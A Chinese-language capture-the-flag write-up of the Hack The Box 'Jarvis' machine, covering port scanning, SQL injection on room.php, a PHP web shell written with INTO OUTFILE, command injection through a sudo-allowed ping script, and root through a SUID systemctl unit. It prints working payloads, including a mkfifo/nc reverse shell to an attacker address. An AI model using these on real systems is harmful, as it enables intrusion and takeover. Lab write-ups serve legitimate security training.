0x00 Recon

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
sudo rustscan -a 10.10.10.143  --ulimit 10000  -- -sC -sS -sV -A  
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-'' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.10.143:22
Open 10.10.10.143:80
Open 10.10.10.143:64999

...

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 03f34e22363e3b813079ed4967651667 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzv4ZGiO8sDRbIsdZhchg+dZEot3z8++mrp9m0VjP6qxr70SwkE0VGu+GkH7vGapJQLMvjTLjyHojU/AcEm9MWTRWdpIrsUirgawwROic6HmdK2e0bVUZa8fNJIoyY1vPa4uNJRKZ+FNoT8qdl9kvG1NGdBl1+zoFbR9az0sgcNZJ1lZzZNnr7zv/Jghd/ZWjeiiVykomVRfSUCZe5qZ/aV6uVmBQ/mdqpXyxPIl1pG642C5j5K84su8CyoiSf0WJ2Vj8GLiKU3EXQzluQ8QJJPJTjj028yuLjDLrtugoFn43O6+IolMZZvGU9Man5Iy5OEWBay9Tn0UDSdjbSPi1X
| 256 25d808a84d6de8d2f8434a2c20c85af6 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCDW2OapO3Dq1CHlnKtWhDucQdl2yQNJA79qP0TDmZBR967hxE9ESMegRuGfQYq0brLSR8Xi6f3O8XL+3bbWbGQ=
| 256 77d4ae1fb0be151ff8cdc8153ac369e1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPuKufVSUgOG304mZjkK8IrZcAGMm76Rfmq2by7C0Nmo
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Stark Hotel
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
64999/tcp open http syn-ack ttl 63 Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET

開了一個奇怪的64999port,進去只會看到

1
Hey you have been banned for 90 seconds, don't be bad 

就先不管這邊直接去80port 看看
四處逛逛發現room.php有奇怪的get方法
http://10.10.10.143/room.php?cod=1
直接?cod=1 這裡看起來很有可能會有問題

0x01 SQLI

用了下面兩個payload測試發現基本上是有了sqli

1
2
http://10.10.10.143/room.php?cod=1%20and%201=2--
http://10.10.10.143/room.php?cod=1%20and%201=1--

先用order by 來確定有多少col

1
http://10.10.10.143/room.php?cod=1%20order%20by%207--

測試完確定有7個
在測試完我大概想的流程可能是SQLI拿到admin的帳號密碼
之後用ssh 22 port 連回去
但寫了腳本dump完發現裡面甚麼都沒有 TT

0x02 SQLI to RCE

在經過了dump to ssh 失敗後,突然想到還有可能SQLI to RCE
畢竟是靶機沒有多想所以直接試了個一句話木馬上去

1
2
3
4
5
6
key = f"<?php echo shell_exec($_GET['c']);?>"


payload = f" union select 1,2,\"{key}\",4,5,6,7 into OUTFILE '/var/www/html/hehe.php'"

r = get(target + payload + "--")

結果發現成功了

一般的webshell不好用我們直接換revershell

0x03 Privilege Escalation

進來後發現自己能用sudo -l

1
2
3
4
5
6
7
8
www-data@jarvis:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on jarvis:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
(pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py

我們直接去看看能不能用這個檔案提權至pepper
經過觀察後直接找的這個能cmd injection的func

1
2
3
4
5
6
7
8
def exec_ping():
forbidden = ['&', ';', '-', '`', '||', '|']
command = input('Enter an IP: ')
for i in forbidden:
if i in command:
print('Got you')
exit()
os.system('ping ' + command)

直接用這個function 彈一個reverseshell
先創一個aaa bash檔案
然後在裡面寫入reverseshell
之後

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
www-data@jarvis:/var/www/html$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
<do -u pepper /var/www/Admin-Utilities/simpler.py -p
***********************************************
_ _
___(_)_ __ ___ _ __ | | ___ _ __ _ __ _ _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | | __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
|_| |_| |___/
@ironhackers.es

***********************************************

Enter an IP: 0.0.0.$(bash /var/www/html/aaa)
0.0.0.$(bash /var/www/html/aaa)

就能拿到pepper的reverse shell了
我們就能在home下拿到user.txt了

1
2
3
pepper@jarvis:~$ cat user.txt
cat user.txt
6xxxxxxxxxxxxxxxxxxxxxxxxxx5

最後嘗試使用find 找 suid

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
pepper@jarvis:~$ find / -perm -u=s -type f 2>/dev/null       
find / -perm -u=s -type f 2>/dev/null
/bin/fusermount
/bin/mount
/bin/ping
/bin/systemctl
/bin/umount
/bin/su
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

看到systemctl
因此這邊就直接用systemctl提權
詳情可以看這邊 https://gist.github.com/A1vinSmith/78786df7899a840ec43c5ddecb6a4740
先創一個root.service

1
2
3
4
5
6
7
8
9
10
11
cat root.service 
[Unit]
Description=root

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.XX.XX.XX 7777 >/tmp/f'

[Install]
WantedBy=multi-user.target

寫入到/dev/shm,寫在能寫的地方都可以但我指令是用/dev/shm/root.service所以寫到這邊

然後

1
2
/bin/systemctl enable /dev/shm/root.service
/bin/systemctl start root

監聽的port就能收到reverse shell 了
最後這樣就能拿到root.txt了

1
2
3
4
root@jarvis:~# cat root.txt
cat root.txt
3xxxxxxxxxxxxxxxxxxxxxxxxxxxxx4